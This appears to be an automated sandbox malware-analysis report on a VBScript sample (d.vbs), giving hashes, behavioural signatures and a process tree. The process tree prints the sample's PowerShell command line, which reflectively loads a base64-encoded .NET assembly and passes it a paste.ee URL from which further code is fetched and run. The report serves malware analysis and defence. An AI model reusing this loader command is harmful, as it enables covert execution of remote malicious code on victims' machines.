Analysis
-
max time kernel
40s -
max time network
43s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
31-08-2022 12:55
Static task
static1
Behavioral task
behavioral1
Sample
d.vbs
Resource
win7-20220812-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
d.vbs
Resource
win10v2004-20220812-en
windows10-2004-x64
17 signatures
150 seconds
General
-
Target
d.vbs
-
Size
816KB
-
MD5
2af5abb6db76b3f1872d568880aced94
-
SHA1
1e47fb1ba30452f72db8f71fe8dde5a7ad5c1f2c
-
SHA256
3da90ba538cd2589d4018e15b760db3c508d6ffbb7032e3a66789a4c9d09c7b2
-
SHA512
ba2e899b365b637547301e2402f16f686badb3f182456dc9c552d1e25eb5a6ca6fa9d75cfe9e260f6ba0edba608daf7dee516cc58c659b8b4844388b330889d2
-
SSDEEP
6144:nfBfcfYfBfcfhfKfzfffBfcfYfBfcfhfKfqfBfcfYfBfcfhfKfdfBfcfYfBfcfht:r
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 112 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1504 wrote to memory of 112 1504 WScript.exe 26 PID 1504 wrote to memory of 112 1504 WScript.exe 26 PID 1504 wrote to memory of 112 1504 WScript.exe 26
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $fs = Get-Content -Path 'C:\Windows\Temp\dll4.txt';[Byte[]] $rOWg = [system.Convert]::FromBase64string( $fs );[Reflection.Assembly]::Load($rOWg).GetType('ClassLibrary2.Class1').GetMethod('execution').Invoke($null, [object[]] ('https://paste.ee/d/6g9rH/0'))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112
-